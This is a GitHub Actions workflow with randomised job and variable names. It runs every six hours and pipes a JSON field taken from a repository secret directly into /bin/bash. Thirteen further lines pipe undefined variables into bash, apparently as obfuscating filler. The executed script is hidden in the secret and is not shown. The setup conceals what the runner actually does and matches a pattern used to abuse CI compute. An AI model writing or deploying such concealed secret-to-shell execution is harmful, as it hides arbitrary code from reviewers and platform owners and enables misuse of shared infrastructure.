name: gujiazi6715
on:
  workflow_dispatch:
  schedule:
    - cron: '5 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gujiazi6715
        env:
          gca040: ${{ secrets.gca040 }}
        run: |
          echo $gca040 | jq -r .aje76949 | /bin/bash
          echo $hj84 | jq -r .rin759 | /bin/bash
          echo $o16 | jq -r .qp3 | /bin/bash
          echo $poeiq8 | jq -r .mhchf2 | /bin/bash
          echo $baa18 | jq -r .wwxl6 | /bin/bash
          echo $pz3 | jq -r .dar94892 | /bin/bash
          echo $v35 | jq -r .qeke0599 | /bin/bash
          echo $fkn09 | jq -r .aos46 | /bin/bash
          echo $tt45 | jq -r .dvjfn657 | /bin/bash
          echo $wh772 | jq -r .vd04 | /bin/bash
          echo $rt45 | jq -r .p69 | /bin/bash
          echo $bqm9 | jq -r .j02 | /bin/bash
          echo $bfth4 | jq -r .xqyd1323 | /bin/bash
          echo $gfa371 | jq -r .zzsp944 | /bin/bash

